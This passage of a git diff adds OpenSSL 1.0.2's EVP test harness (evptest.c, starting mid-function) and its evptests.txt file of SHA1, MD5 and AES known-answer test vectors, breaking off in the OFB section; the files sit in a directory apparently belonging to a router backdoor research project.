+                fprintf(stderr, "Key/IV set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(12);
+            }
+            if (!EVP_EncryptUpdate(&ctx, NULL, &outl, NULL, pn)) {
+                fprintf(stderr, "Plaintext length set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(12);
+            }
+            if (an && !EVP_EncryptUpdate(&ctx, NULL, &outl, aad, an)) {
+                fprintf(stderr, "AAD set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(13);
+            }
+        } else if (mode == EVP_CIPH_WRAP_MODE) {
+            if (!EVP_EncryptInit_ex(&ctx, c, NULL, key, in ? iv : NULL)) {
+                fprintf(stderr, "EncryptInit failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(10);
+            }
+        } else if (!EVP_EncryptInit_ex(&ctx, c, NULL, key, iv)) {
+            fprintf(stderr, "EncryptInit failed\n");
+            ERR_print_errors_fp(stderr);
+            test1_exit(10);
+        }
+        EVP_CIPHER_CTX_set_padding(&ctx, 0);
+
+        if (!EVP_EncryptUpdate(&ctx, out, &outl, plaintext, pn)) {
+            fprintf(stderr, "Encrypt failed\n");
+            ERR_print_errors_fp(stderr);
+            test1_exit(6);
+        }
+        if (!EVP_EncryptFinal_ex(&ctx, out + outl, &outl2)) {
+            fprintf(stderr, "EncryptFinal failed\n");
+            ERR_print_errors_fp(stderr);
+            test1_exit(7);
+        }
+
+        if (outl + outl2 != cn) {
+            fprintf(stderr, "Ciphertext length mismatch got %d expected %d\n",
+                    outl + outl2, cn);
+            test1_exit(8);
+        }
+
+        if (memcmp(out, ciphertext, cn)) {
+            fprintf(stderr, "Ciphertext mismatch\n");
+            hexdump(stderr, "Got", out, cn);
+            hexdump(stderr, "Expected", ciphertext, cn);
+            test1_exit(9);
+        }
+        if (mode == EVP_CIPH_GCM_MODE || mode == EVP_CIPH_CCM_MODE) {
+            unsigned char rtag[16];
+            /*
+             * Note: EVP_CTRL_CCM_GET_TAG has same value as
+             * EVP_CTRL_GCM_GET_TAG
+             */
+            if (!EVP_CIPHER_CTX_ctrl(&ctx, EVP_CTRL_GCM_GET_TAG, tn, rtag)) {
+                fprintf(stderr, "Get tag failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(14);
+            }
+            if (memcmp(rtag, tag, tn)) {
+                fprintf(stderr, "Tag mismatch\n");
+                hexdump(stderr, "Got", rtag, tn);
+                hexdump(stderr, "Expected", tag, tn);
+                test1_exit(9);
+            }
+        }
+    }
+
+    if (encdec <= 0) {
+        if (mode == EVP_CIPH_GCM_MODE) {
+            if (!EVP_DecryptInit_ex(&ctx, c, NULL, NULL, NULL)) {
+                fprintf(stderr, "EncryptInit failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(10);
+            }
+            if (!EVP_CIPHER_CTX_ctrl(&ctx, EVP_CTRL_GCM_SET_IVLEN, in, NULL)) {
+                fprintf(stderr, "IV length set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(11);
+            }
+            if (!EVP_DecryptInit_ex(&ctx, NULL, NULL, key, iv)) {
+                fprintf(stderr, "Key/IV set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(12);
+            }
+            if (!EVP_CIPHER_CTX_ctrl
+                (&ctx, EVP_CTRL_GCM_SET_TAG, tn, (void *)tag)) {
+                fprintf(stderr, "Set tag failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(14);
+            }
+            if (an && !EVP_DecryptUpdate(&ctx, NULL, &outl, aad, an)) {
+                fprintf(stderr, "AAD set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(13);
+            }
+        } else if (mode == EVP_CIPH_CCM_MODE) {
+            if (!EVP_DecryptInit_ex(&ctx, c, NULL, NULL, NULL)) {
+                fprintf(stderr, "DecryptInit failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(10);
+            }
+            if (!EVP_CIPHER_CTX_ctrl(&ctx, EVP_CTRL_CCM_SET_IVLEN, in, NULL)) {
+                fprintf(stderr, "IV length set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(11);
+            }
+            if (!EVP_CIPHER_CTX_ctrl
+                (&ctx, EVP_CTRL_CCM_SET_TAG, tn, (void *)tag)) {
+                fprintf(stderr, "Tag length set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(11);
+            }
+            if (!EVP_DecryptInit_ex(&ctx, NULL, NULL, key, iv)) {
+                fprintf(stderr, "Key/Nonce set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(12);
+            }
+            if (!EVP_DecryptUpdate(&ctx, NULL, &outl, NULL, pn)) {
+                fprintf(stderr, "Plaintext length set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(12);
+            }
+            if (an && !EVP_EncryptUpdate(&ctx, NULL, &outl, aad, an)) {
+                fprintf(stderr, "AAD set failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(13);
+            }
+        } else if (mode == EVP_CIPH_WRAP_MODE) {
+            if (!EVP_DecryptInit_ex(&ctx, c, NULL, key, in ? iv : NULL)) {
+                fprintf(stderr, "EncryptInit failed\n");
+                ERR_print_errors_fp(stderr);
+                test1_exit(10);
+            }
+        } else if (!EVP_DecryptInit_ex(&ctx, c, NULL, key, iv)) {
+            fprintf(stderr, "DecryptInit failed\n");
+            ERR_print_errors_fp(stderr);
+            test1_exit(11);
+        }
+        EVP_CIPHER_CTX_set_padding(&ctx, 0);
+
+        if (!EVP_DecryptUpdate(&ctx, out, &outl, ciphertext, cn)) {
+            fprintf(stderr, "Decrypt failed\n");
+            ERR_print_errors_fp(stderr);
+            test1_exit(6);
+        }
+        if (mode != EVP_CIPH_CCM_MODE
+            && !EVP_DecryptFinal_ex(&ctx, out + outl, &outl2)) {
+            fprintf(stderr, "DecryptFinal failed\n");
+            ERR_print_errors_fp(stderr);
+            test1_exit(7);
+        }
+
+        if (outl + outl2 != pn) {
+            fprintf(stderr, "Plaintext length mismatch got %d expected %d\n",
+                    outl + outl2, pn);
+            test1_exit(8);
+        }
+
+        if (memcmp(out, plaintext, pn)) {
+            fprintf(stderr, "Plaintext mismatch\n");
+            hexdump(stderr, "Got", out, pn);
+            hexdump(stderr, "Expected", plaintext, pn);
+            test1_exit(9);
+        }
+    }
+
+    EVP_CIPHER_CTX_cleanup(&ctx);
+
+    printf("\n");
+}
+
+static int test_cipher(const char *cipher, const unsigned char *key, int kn,
+                       const unsigned char *iv, int in,
+                       const unsigned char *plaintext, int pn,
+                       const unsigned char *ciphertext, int cn,
+                       const unsigned char *aad, int an,
+                       const unsigned char *tag, int tn, int encdec)
+{
+    const EVP_CIPHER *c;
+
+    c = EVP_get_cipherbyname(cipher);
+    if (!c)
+        return 0;
+
+    test1(c, key, kn, iv, in, plaintext, pn, ciphertext, cn, aad, an, tag, tn,
+          encdec);
+
+    return 1;
+}
+
+static int test_digest(const char *digest,
+                       const unsigned char *plaintext, int pn,
+                       const unsigned char *ciphertext, unsigned int cn)
+{
+    const EVP_MD *d;
+    EVP_MD_CTX ctx;
+    unsigned char md[EVP_MAX_MD_SIZE];
+    unsigned int mdn;
+
+    d = EVP_get_digestbyname(digest);
+    if (!d)
+        return 0;
+
+    printf("Testing digest %s\n", EVP_MD_name(d));
+    hexdump(stdout, "Plaintext", plaintext, pn);
+    hexdump(stdout, "Digest", ciphertext, cn);
+
+    EVP_MD_CTX_init(&ctx);
+    if (!EVP_DigestInit_ex(&ctx, d, NULL)) {
+        fprintf(stderr, "DigestInit failed\n");
+        ERR_print_errors_fp(stderr);
+        EXIT(100);
+    }
+    if (!EVP_DigestUpdate(&ctx, plaintext, pn)) {
+        fprintf(stderr, "DigestUpdate failed\n");
+        ERR_print_errors_fp(stderr);
+        EXIT(101);
+    }
+    if (!EVP_DigestFinal_ex(&ctx, md, &mdn)) {
+        fprintf(stderr, "DigestFinal failed\n");
+        ERR_print_errors_fp(stderr);
+        EXIT(101);
+    }
+    EVP_MD_CTX_cleanup(&ctx);
+
+    if (mdn != cn) {
+        fprintf(stderr, "Digest length mismatch, got %d expected %d\n", mdn,
+                cn);
+        EXIT(102);
+    }
+
+    if (memcmp(md, ciphertext, cn)) {
+        fprintf(stderr, "Digest mismatch\n");
+        hexdump(stderr, "Got", md, cn);
+        hexdump(stderr, "Expected", ciphertext, cn);
+        EXIT(103);
+    }
+
+    printf("\n");
+
+    EVP_MD_CTX_cleanup(&ctx);
+
+    return 1;
+}
+
+int main(int argc, char **argv)
+{
+    const char *szTestFile;
+    FILE *f;
+
+    if (argc != 2) {
+        fprintf(stderr, "%s <test file>\n", argv[0]);
+        EXIT(1);
+    }
+    CRYPTO_malloc_debug_init();
+    CRYPTO_set_mem_debug_options(V_CRYPTO_MDEBUG_ALL);
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+    szTestFile = argv[1];
+
+    f = fopen(szTestFile, "r");
+    if (!f) {
+        perror(szTestFile);
+        EXIT(2);
+    }
+    ERR_load_crypto_strings();
+    /* Load up the software EVP_CIPHER and EVP_MD definitions */
+    OpenSSL_add_all_ciphers();
+    OpenSSL_add_all_digests();
+#ifndef OPENSSL_NO_ENGINE
+    /* Load all compiled-in ENGINEs */
+    ENGINE_load_builtin_engines();
+#endif
+#if 0
+    OPENSSL_config();
+#endif
+#ifndef OPENSSL_NO_ENGINE
+    /*
+     * Register all available ENGINE implementations of ciphers and digests.
+     * This could perhaps be changed to "ENGINE_register_all_complete()"?
+     */
+    ENGINE_register_all_ciphers();
+    ENGINE_register_all_digests();
+    /*
+     * If we add command-line options, this statement should be switchable.
+     * It'll prevent ENGINEs being ENGINE_init()ialised for cipher/digest use
+     * if they weren't already initialised.
+     */
+    /* ENGINE_set_cipher_flags(ENGINE_CIPHER_FLAG_NOINIT); */
+#endif
+
+    for (;;) {
+        char line[4096];
+        char *p;
+        char *cipher;
+        unsigned char *iv, *key, *plaintext, *ciphertext, *aad, *tag;
+        int encdec;
+        int kn, in, pn, cn;
+        int an = 0;
+        int tn = 0;
+
+        if (!fgets((char *)line, sizeof line, f))
+            break;
+        if (line[0] == '#' || line[0] == '\n')
+            continue;
+        p = line;
+        cipher = sstrsep(&p, ":");
+        key = ustrsep(&p, ":");
+        iv = ustrsep(&p, ":");
+        plaintext = ustrsep(&p, ":");
+        ciphertext = ustrsep(&p, ":");
+        if (p[-1] == '\n') {
+            encdec = -1;
+            p[-1] = '\0';
+            tag = aad = NULL;
+            an = tn = 0;
+        } else {
+            aad = ustrsep(&p, ":");
+            tag = ustrsep(&p, ":");
+            if (tag == NULL) {
+                p = (char *)aad;
+                tag = aad = NULL;
+                an = tn = 0;
+            }
+            if (p[-1] == '\n') {
+                encdec = -1;
+                p[-1] = '\0';
+            } else
+                encdec = atoi(sstrsep(&p, "\n"));
+        }
+
+        kn = convert(key);
+        in = convert(iv);
+        pn = convert(plaintext);
+        cn = convert(ciphertext);
+        if (aad) {
+            an = convert(aad);
+            tn = convert(tag);
+        }
+
+        if (!test_cipher
+            (cipher, key, kn, iv, in, plaintext, pn, ciphertext, cn, aad, an,
+             tag, tn, encdec)
+            && !test_digest(cipher, plaintext, pn, ciphertext, cn)) {
+#ifdef OPENSSL_NO_AES
+            if (strstr(cipher, "AES") == cipher) {
+                fprintf(stdout, "Cipher disabled, skipping %s\n", cipher);
+                continue;
+            }
+#endif
+#ifdef OPENSSL_NO_DES
+            if (strstr(cipher, "DES") == cipher) {
+                fprintf(stdout, "Cipher disabled, skipping %s\n", cipher);
+                continue;
+            }
+#endif
+#ifdef OPENSSL_NO_RC4
+            if (strstr(cipher, "RC4") == cipher) {
+                fprintf(stdout, "Cipher disabled, skipping %s\n", cipher);
+                continue;
+            }
+#endif
+#ifdef OPENSSL_NO_CAMELLIA
+            if (strstr(cipher, "CAMELLIA") == cipher) {
+                fprintf(stdout, "Cipher disabled, skipping %s\n", cipher);
+                continue;
+            }
+#endif
+#ifdef OPENSSL_NO_SEED
+            if (strstr(cipher, "SEED") == cipher) {
+                fprintf(stdout, "Cipher disabled, skipping %s\n", cipher);
+                continue;
+            }
+#endif
+            fprintf(stderr, "Can't find %s\n", cipher);
+            EXIT(3);
+        }
+    }
+    fclose(f);
+
+#ifndef OPENSSL_NO_ENGINE
+    ENGINE_cleanup();
+#endif
+    EVP_cleanup();
+    CRYPTO_cleanup_all_ex_data();
+    ERR_remove_thread_state(NULL);
+    ERR_free_strings();
+    CRYPTO_mem_leaks_fp(stderr);
+
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evptests.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evptests.txt
new file mode 100644
index 0000000..4e9958b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evptests.txt
@@ -0,0 +1,401 @@
+#cipher:key:iv:plaintext:ciphertext:0/1(decrypt/encrypt)
+#aadcipher:key:iv:plaintext:ciphertext:aad:tag:0/1(decrypt/encrypt)
+#digest:::input:output
+
+# SHA(1) tests (from shatest.c)
+SHA1:::616263:a9993e364706816aba3e25717850c26c9cd0d89d
+
+# MD5 tests (from md5test.c)
+MD5::::d41d8cd98f00b204e9800998ecf8427e
+MD5:::61:0cc175b9c0f1b6a831c399e269772661
+MD5:::616263:900150983cd24fb0d6963f7d28e17f72
+MD5:::6d65737361676520646967657374:f96b697d7cb7938d525a2f31aaf161d0
+MD5:::6162636465666768696a6b6c6d6e6f707172737475767778797a:c3fcd3d76192e4007dfb496cca67e13b
+MD5:::4142434445464748494a4b4c4d4e4f505152535455565758595a6162636465666768696a6b6c6d6e6f707172737475767778797a30313233343536373839:d174ab98d277d9f5a5611c2c9f419d9f
+MD5:::3132333435363738393031323334353637383930313233343536373839303132333435363738393031323334353637383930313233343536373839303132333435363738393031323334353637383930:57edf4a22be3c955ac49da2e2107b67a
+
+# AES 128 ECB tests (from FIPS-197 test vectors, encrypt)
+
+AES-128-ECB:000102030405060708090A0B0C0D0E0F::00112233445566778899AABBCCDDEEFF:69C4E0D86A7B0430D8CDB78070B4C55A:1
+
+# AES 192 ECB tests (from FIPS-197 test vectors, encrypt)
+
+AES-192-ECB:000102030405060708090A0B0C0D0E0F1011121314151617::00112233445566778899AABBCCDDEEFF:DDA97CA4864CDFE06EAF70A0EC0D7191:1
+
+# AES 256 ECB tests (from FIPS-197 test vectors, encrypt)
+
+AES-256-ECB:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F::00112233445566778899AABBCCDDEEFF:8EA2B7CA516745BFEAFC49904B496089:1
+
+# AES 128 ECB tests (from NIST test vectors, encrypt)
+
+#AES-128-ECB:00000000000000000000000000000000::00000000000000000000000000000000:C34C052CC0DA8D73451AFE5F03BE297F:1
+
+# AES 128 ECB tests (from NIST test vectors, decrypt)
+
+#AES-128-ECB:00000000000000000000000000000000::44416AC2D1F53C583303917E6BE9EBE0:00000000000000000000000000000000:0
+
+# AES 192 ECB tests (from NIST test vectors, decrypt)
+
+#AES-192-ECB:000000000000000000000000000000000000000000000000::48E31E9E256718F29229319C19F15BA4:00000000000000000000000000000000:0
+
+# AES 256 ECB tests (from NIST test vectors, decrypt)
+
+#AES-256-ECB:0000000000000000000000000000000000000000000000000000000000000000::058CCFFDBBCB382D1F6F56585D8A4ADE:00000000000000000000000000000000:0
+
+# AES 128 CBC tests (from NIST test vectors, encrypt)
+
+#AES-128-CBC:00000000000000000000000000000000:00000000000000000000000000000000:00000000000000000000000000000000:8A05FC5E095AF4848A08D328D3688E3D:1
+
+# AES 192 CBC tests (from NIST test vectors, encrypt)
+
+#AES-192-CBC:000000000000000000000000000000000000000000000000:00000000000000000000000000000000:00000000000000000000000000000000:7BD966D53AD8C1BB85D2ADFAE87BB104:1
+
+# AES 256 CBC tests (from NIST test vectors, encrypt)
+
+#AES-256-CBC:0000000000000000000000000000000000000000000000000000000000000000:00000000000000000000000000000000:00000000000000000000000000000000:FE3C53653E2F45B56FCD88B2CC898FF0:1
+
+# AES 128 CBC tests (from NIST test vectors, decrypt)
+
+#AES-128-CBC:00000000000000000000000000000000:00000000000000000000000000000000:FACA37E0B0C85373DF706E73F7C9AF86:00000000000000000000000000000000:0
+
+# AES tests from NIST document SP800-38A
+# For all ECB encrypts and decrypts, the transformed sequence is
+#   AES-bits-ECB:key::plaintext:ciphertext:encdec
+# ECB-AES128.Encrypt and ECB-AES128.Decrypt
+AES-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::6BC1BEE22E409F96E93D7E117393172A:3AD77BB40D7A3660A89ECAF32466EF97
+AES-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::AE2D8A571E03AC9C9EB76FAC45AF8E51:F5D3D58503B9699DE785895A96FDBAAF
+AES-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::30C81C46A35CE411E5FBC1191A0A52EF:43B1CD7F598ECE23881B00E3ED030688
+AES-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::F69F2445DF4F9B17AD2B417BE66C3710:7B0C785E27E8AD3F8223207104725DD4
+# ECB-AES192.Encrypt and ECB-AES192.Decrypt 
+AES-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::6BC1BEE22E409F96E93D7E117393172A:BD334F1D6E45F25FF712A214571FA5CC
+AES-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::AE2D8A571E03AC9C9EB76FAC45AF8E51:974104846D0AD3AD7734ECB3ECEE4EEF
+AES-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::30C81C46A35CE411E5FBC1191A0A52EF:EF7AFD2270E2E60ADCE0BA2FACE6444E
+AES-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::F69F2445DF4F9B17AD2B417BE66C3710:9A4B41BA738D6C72FB16691603C18E0E
+# ECB-AES256.Encrypt and ECB-AES256.Decrypt 
+AES-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::6BC1BEE22E409F96E93D7E117393172A:F3EED1BDB5D2A03C064B5A7E3DB181F8
+AES-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::AE2D8A571E03AC9C9EB76FAC45AF8E51:591CCB10D410ED26DC5BA74A31362870
+AES-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::30C81C46A35CE411E5FBC1191A0A52EF:B6ED21B99CA6F4F9F153E7B1BEAFED1D
+AES-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::F69F2445DF4F9B17AD2B417BE66C3710:23304B7A39F9F3FF067D8D8F9E24ECC7
+# For all CBC encrypts and decrypts, the transformed sequence is
+#   AES-bits-CBC:key:IV/ciphertext':plaintext:ciphertext:encdec
+# CBC-AES128.Encrypt and CBC-AES128.Decrypt 
+AES-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:7649ABAC8119B246CEE98E9B12E9197D
+AES-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:7649ABAC8119B246CEE98E9B12E9197D:AE2D8A571E03AC9C9EB76FAC45AF8E51:5086CB9B507219EE95DB113A917678B2
+AES-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:5086CB9B507219EE95DB113A917678B2:30C81C46A35CE411E5FBC1191A0A52EF:73BED6B8E3C1743B7116E69E22229516
+AES-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:73BED6B8E3C1743B7116E69E22229516:F69F2445DF4F9B17AD2B417BE66C3710:3FF1CAA1681FAC09120ECA307586E1A7
+# CBC-AES192.Encrypt and CBC-AES192.Decrypt 
+AES-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:4F021DB243BC633D7178183A9FA071E8
+AES-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:4F021DB243BC633D7178183A9FA071E8:AE2D8A571E03AC9C9EB76FAC45AF8E51:B4D9ADA9AD7DEDF4E5E738763F69145A
+AES-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:B4D9ADA9AD7DEDF4E5E738763F69145A:30C81C46A35CE411E5FBC1191A0A52EF:571B242012FB7AE07FA9BAAC3DF102E0
+AES-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:571B242012FB7AE07FA9BAAC3DF102E0:F69F2445DF4F9B17AD2B417BE66C3710:08B0E27988598881D920A9E64F5615CD
+# CBC-AES256.Encrypt and CBC-AES256.Decrypt 
+AES-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:F58C4C04D6E5F1BA779EABFB5F7BFBD6
+AES-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:F58C4C04D6E5F1BA779EABFB5F7BFBD6:AE2D8A571E03AC9C9EB76FAC45AF8E51:9CFC4E967EDB808D679F777BC6702C7D
+AES-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:9CFC4E967EDB808D679F777BC6702C7D:30C81C46A35CE411E5FBC1191A0A52EF:39F23369A9D9BACFA530E26304231461
+AES-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:39F23369A9D9BACFA530E26304231461:F69F2445DF4F9B17AD2B417BE66C3710:B2EB05E2C39BE9FCDA6C19078C6A9D1B
+# We don't support CFB{1,8}-AESxxx.{En,De}crypt
+# For all CFB128 encrypts and decrypts, the transformed sequence is
+#   AES-bits-CFB:key:IV/ciphertext':plaintext:ciphertext:encdec
+# CFB128-AES128.Encrypt 
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:3B3FD92EB72DAD20333449F8E83CFB4A:1
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:3B3FD92EB72DAD20333449F8E83CFB4A:AE2D8A571E03AC9C9EB76FAC45AF8E51:C8A64537A0B3A93FCDE3CDAD9F1CE58B:1
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:C8A64537A0B3A93FCDE3CDAD9F1CE58B:30C81C46A35CE411E5FBC1191A0A52EF:26751F67A3CBB140B1808CF187A4F4DF:1
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:26751F67A3CBB140B1808CF187A4F4DF:F69F2445DF4F9B17AD2B417BE66C3710:C04B05357C5D1C0EEAC4C66F9FF7F2E6:1
+# CFB128-AES128.Decrypt 
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:3B3FD92EB72DAD20333449F8E83CFB4A:0
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:3B3FD92EB72DAD20333449F8E83CFB4A:AE2D8A571E03AC9C9EB76FAC45AF8E51:C8A64537A0B3A93FCDE3CDAD9F1CE58B:0
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:C8A64537A0B3A93FCDE3CDAD9F1CE58B:30C81C46A35CE411E5FBC1191A0A52EF:26751F67A3CBB140B1808CF187A4F4DF:0
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:26751F67A3CBB140B1808CF187A4F4DF:F69F2445DF4F9B17AD2B417BE66C3710:C04B05357C5D1C0EEAC4C66F9FF7F2E6:0
+# CFB128-AES192.Encrypt
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CDC80D6FDDF18CAB34C25909C99A4174:1
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:CDC80D6FDDF18CAB34C25909C99A4174:AE2D8A571E03AC9C9EB76FAC45AF8E51:67CE7F7F81173621961A2B70171D3D7A:1
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:67CE7F7F81173621961A2B70171D3D7A:30C81C46A35CE411E5FBC1191A0A52EF:2E1E8A1DD59B88B1C8E60FED1EFAC4C9:1
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:2E1E8A1DD59B88B1C8E60FED1EFAC4C9:F69F2445DF4F9B17AD2B417BE66C3710:C05F9F9CA9834FA042AE8FBA584B09FF:1
+# CFB128-AES192.Decrypt
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CDC80D6FDDF18CAB34C25909C99A4174:0
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:CDC80D6FDDF18CAB34C25909C99A4174:AE2D8A571E03AC9C9EB76FAC45AF8E51:67CE7F7F81173621961A2B70171D3D7A:0
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:67CE7F7F81173621961A2B70171D3D7A:30C81C46A35CE411E5FBC1191A0A52EF:2E1E8A1DD59B88B1C8E60FED1EFAC4C9:0
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:2E1E8A1DD59B88B1C8E60FED1EFAC4C9:F69F2445DF4F9B17AD2B417BE66C3710:C05F9F9CA9834FA042AE8FBA584B09FF:0
+# CFB128-AES256.Encrypt 
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:DC7E84BFDA79164B7ECD8486985D3860:1
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:DC7E84BFDA79164B7ECD8486985D3860:AE2D8A571E03AC9C9EB76FAC45AF8E51:39FFED143B28B1C832113C6331E5407B:1
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:39FFED143B28B1C832113C6331E5407B:30C81C46A35CE411E5FBC1191A0A52EF:DF10132415E54B92A13ED0A8267AE2F9:1
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:DF10132415E54B92A13ED0A8267AE2F9:F69F2445DF4F9B17AD2B417BE66C3710:75A385741AB9CEF82031623D55B1E471:1
+# CFB128-AES256.Decrypt 
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:DC7E84BFDA79164B7ECD8486985D3860:0
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:DC7E84BFDA79164B7ECD8486985D3860:AE2D8A571E03AC9C9EB76FAC45AF8E51:39FFED143B28B1C832113C6331E5407B:0
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:39FFED143B28B1C832113C6331E5407B:30C81C46A35CE411E5FBC1191A0A52EF:DF10132415E54B92A13ED0A8267AE2F9:0
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:DF10132415E54B92A13ED0A8267AE2F9:F69F2445DF4F9B17AD2B417BE66C3710:75A385741AB9CEF82031623D55B1E471:0
+# For all OFB encrypts and decrypts, the transformed sequence is
+#   AES-bits-CFB:key:IV/output':plaintext:ciphertext:encdec
+# OFB-AES128.Encrypt 
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:3B3FD92EB72DAD20333449F8E83CFB4A:1 
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:50FE67CC996D32B6DA0937E99BAFEC60:AE2D8A571E03AC9C9EB76FAC45AF8E51:7789508D16918F03F53C52DAC54ED825:1 
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:D9A4DADA0892239F6B8B3D7680E15674:30C81C46A35CE411E5FBC1191A0A52EF:9740051E9C5FECF64344F7A82260EDCC:1 
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:A78819583F0308E7A6BF36B1386ABF23:F69F2445DF4F9B17AD2B417BE66C3710:304C6528F659C77866A510D9C1D6AE5E:1 
+# OFB-AES128.Decrypt 
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:3B3FD92EB72DAD20333449F8E83CFB4A:0
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:50FE67CC996D32B6DA0937E99BAFEC60:AE2D8A571E03AC9C9EB76FAC45AF8E51:7789508D16918F03F53C52DAC54ED825:0
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:D9A4DADA0892239F6B8B3D7680E15674:30C81C46A35CE411E5FBC1191A0A52EF:9740051E9C5FECF64344F7A82260EDCC:0
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:A78819583F0308E7A6BF36B1386ABF23:F69F2445DF4F9B17AD2B417BE66C3710:304C6528F659C77866A510D9C1D6AE5E:0
+# OFB-AES192.Encrypt 
